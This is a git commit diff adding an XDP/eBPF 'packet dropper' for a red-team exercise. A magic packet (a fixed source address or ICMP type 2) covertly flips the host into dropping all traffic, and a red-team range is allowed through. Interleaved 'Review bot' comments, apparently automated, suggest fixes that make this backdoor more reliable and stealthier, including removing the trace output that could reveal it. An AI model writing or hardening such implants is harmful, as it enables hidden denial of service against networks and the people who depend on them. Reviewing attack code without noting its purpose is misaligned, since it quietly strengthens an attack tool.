authorRyan Schanzenbacher <ryan@rschanz.org>2023-03-20 18:03:45 -0400
committerRyan Schanzenbacher <ryan@rschanz.org>2023-03-20 18:03:45 -0400
commitb9ef8fbd63fface91ff3cd98d7d702f9827c322d (patch)
treeafac97ee882a4e9ab7ffab169980c73ba51cc535 /xdp-program
parentf8616c8274a9b2e378f57e98f0d17b61358b00c3 (diff)
Diffstat (limited to 'xdp-program')
-rw-r--r--xdp-program/packet_dropper.c77
-rw-r--r--xdp-program/packet_dropper.obin0 -> 8648 bytes
-rw-r--r--xdp-program/packet_dropper_new.c95
3 files changed, 172 insertions, 0 deletions
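--- /dev/null
+++ b/xdp-program/packet_dropper.c
@@ -0,0 +1,77 @@
+#include <linux/bpf.h>
+#include <bpf/bpf_helpers.h>
+#include <linux/if_ether.h>
+#include <linux/in.h>
+#include <linux/if_packet.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+
+struct {
+    __uint(type, BPF_MAP_TYPE_ARRAY);
+    __type(key, __u32);
+    __type(value, __u32);
+    __uint(max_entries, 1);
+} status SEC(".maps");
+
+SEC("xdpentry")
+int entry(struct xdp_md *ctx) {
+    // Prepare some data structures
+    __u32 *rec;
+    __u32 key = 0;
+    void *data_end = (void *)(long)ctx->data_end;
+    void *data = (void *)(long)ctx->data;
+    struct ethhdr *eth = data;
+
+    rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
+    if (!rec) {
+        return XDP_DROP; // try to lay low on error
+    }
+    //bpf_printk("Rec: %u", *rec); // Debug prints
+    if ((*rec != 55) && (*rec != 56)) {
+        // First run check
+        // bpf_printk("Resetting rec!"); // Debug Prints
+        *rec = 56; // set default value for map
+    }
+
+    if (eth + 1 > data_end) // Bounds checking for xdp preverifier
+        return XDP_PASS; // This should never run normally
+
+    /** if(eth->h_proto != ETH_P_IP) {
+        return XDP_PASS; // don't kill layer 2 traffic
+    } **/
+
+    struct iphdr *iph = data + sizeof(struct ethhdr);
+    if (iph + 1 > data_end) // More bounds checking
+        return XDP_PASS; // This should never run either
+    //
+    __u32 ip_src = iph->saddr; // grab source address of packet
+    // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
+    // Determine if we need to further process this packet
+    if (ip_src == 1946091487) {
+        // This packet had a destination of 223.255.254.115, do something!
+        // bpf_printk("Got it!, setting rec..."); // Debug print
+        switch (*rec) {
+            case 55 :
+                *rec = 56;
+                break;
+            case 56 :
+                *rec = 55;
+                break;
+        }
+        return XDP_DROP;
+    }
+    else if (ip_src == 0) {
+        // most likely a layer 2 packet, let it thru
+        return XDP_PASS;
+    }
+
+    // Finish processing
+    if (*rec == 55) {
+        return XDP_DROP;
+    } else {
+        return XDP_PASS;
+    }
+}
+
+
+char _license[] SEC("license")= "GPL";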
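Review bot: The EtherType guard at lines 39–41 is commented out, so every non-IPv4 frame (ARP, IPv6, VLAN-tagged) is parsed as an IPv4 header and `iph->saddr` is read from whatever bytes sit at offset 26; the `ip_src == 0` branch at line 63 is only a heuristic for that case and does not catch, for example, an ARP reply whose bytes there are non-zero. Restore the guard with the byte order fixed, `if (eth->h_proto != bpf_htons(ETH_P_IP)) return XDP_PASS;` (this needs `<bpf/bpf_endian.h>`, which this file does not include), after which the saddr-equals-zero branch can go. The trigger at line 50 is an unauthenticated, trivially spoofable source address, so anyone who can inject a packet with saddr 223.255.254.115 can flip the drop state; the constant 1946091487 also encodes that address only on a little-endian host, so `bpf_htonl(0xDFFFFE73)` would be the portable spelling, and the comment at line 51 says "destination" while the code compares `saddr`. The `*rec` toggle in the switch at lines 53–60 is a plain read-modify-write on a shared array-map entry that concurrent CPUs can interleave; since the two states differ only in the low bits, `__sync_fetch_and_xor(rec, 55 ^ 56)` would make the flip atomic (assuming a kernel with BPF atomic support — confirm against the target).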
diff --git a/xdp-program/packet_dropper.o b/xdp-program/packet_dropper.o
new file mode 100644
index 0000000..3958484
--- /dev/null
+++ b/xdp-program/packet_dropper.o
Binary files differ
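--- /dev/null
+++ b/xdp-program/packet_dropper_new.c
@@ -0,0 +1,95 @@
+#include <linux/bpf.h>
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_endian.h>
+#include <linux/if_ether.h>
+#include <linux/in.h>
+#include <linux/if_packet.h>
+#include <linux/ip.h>
+#include <linux/icmp.h>
+#include <linux/if_vlan.h>
+
+struct {
+    __uint(type, BPF_MAP_TYPE_ARRAY);
+    __type(key, __u32);
+    __type(value, __u32);
+    __uint(max_entries, 1);
+} status SEC(".maps");
+
+SEC("xdpentry")
+int entry(struct xdp_md *ctx) {
+    // Prepare some data structures
+    __u32 *rec;
+    __u32 key = 0;
+    void *data_end = (void *)(long)ctx->data_end;
+    void *data = (void *)(long)ctx->data;
+    struct ethhdr *eth = data;
+
+    rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
+    if (!rec) {
+        return XDP_DROP; // try to lay low on error
+    }
+    //bpf_printk("Rec: %u", *rec); // Debug prints
+    if ((*rec != 55) && (*rec != 56)) {
+        // First run check
+        // bpf_printk("Resetting rec!"); // Debug Prints
+        *rec = 56; // set default value for map
+    }
+
+    if (eth + 1 > data_end) // Bounds checking for xdp preverifier
+        return XDP_PASS; // This should never run normally
+
+    if(bpf_ntohs(eth->h_proto) == ETH_P_ARP) {
+        return XDP_PASS; // don't kill layer 2 traffic
+    }
+
+    struct iphdr *iph = data + sizeof(struct ethhdr);
+    if (iph + 1 > data_end) // More bounds checking
+        return XDP_PASS; // This should never run either
+    //
+    __u32 ip_src = iph->saddr; // grab source address of packet
+
+    struct icmphdr *icmph = data + sizeof(struct ethhdr) + sizeof(struct iphdr);
+    if (icmph + 1 > data_end) {
+        // More bounds checking
+        return XDP_PASS;
+    }
+
+    char *pingdata = data + sizeof(struct ethhdr) + sizeof(struct iphdr) + sizeof(struct icmphdr);
+
+    // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
+    // Determine if we need to further process this packet
+    //if (ip_src == 1946091487) {
+    bpf_printk("Incoming packet: %u\n", icmph->type);
+    if (icmph->type == 2 || ip_src == 1946091487) {
+        // This packet had a destination of 223.255.254.115, do something!
+        // bpf_printk("Got it!, setting rec..."); // Debug print
+        switch (*rec) {
+            case 55 :
+                *rec = 56;
+                break;
+            case 56 :
+                *rec = 55;
+                break;
+        }
+        return XDP_DROP;
+    }
+    else if (ip_src == 0) {
+        // most likely a layer 2 packet, let it thru
+        return XDP_PASS;
+    }
+
+    else if (ip_src >= 16974090 && ip_src <= 503513354) {
+        // IP is between 10.1.3.1 and 10.1.3.30. Allow to pass for red team
+        return XDP_PASS;
+    }
+
+    // Finish processing
+    if (*rec == 55) {
+        return XDP_DROP;
+    } else {
+        return XDP_PASS;
+    }
+}
+
+
+char _license[] SEC("license")= "GPL";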
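Review bot: The red-team allowlist at line 81 compares the raw network-order `saddr` as an integer, so the range 16974090..503513354 is not 10.1.3.1–10.1.3.30: on a little-endian host those constants are 0x0103010A and 0x1E03010A, the most significant byte of the compared value is the address's last octet, and roughly any address whose last octet is 1–30 is admitted (192.168.1.5 is 0x0501A8C0 and passes, as does 10.10.10.10), while on a big-endian host the match is different again. Convert first and compare in host order: `__u32 src = bpf_ntohl(ip_src); if (src >= 0x0A010301 && src <= 0x0A01031E) return XDP_PASS;`. The ICMP parse at lines 51–63 never checks `iph->protocol == IPPROTO_ICMP` or honours `iph->ihl`, so `icmph->type` is simply byte 34 of any IPv4 packet: a TCP or UDP segment with source port 512–767 (high byte 0x02) will flip the drop state, and any packet carrying IP options puts the real ICMP header somewhere else; guard with `if (iph->protocol != IPPROTO_ICMP) goto no_trigger;` (or equivalent) and compute the offset from `iph->ihl * 4` with its own bounds check. The `bpf_printk` at line 62 fires on every received packet and writes to the kernel trace buffer, which is both a per-packet cost and, for code that "tries to lay low" on error, a persistent observable artifact in `trace_pipe`; `pingdata` at line 57 is computed but never used.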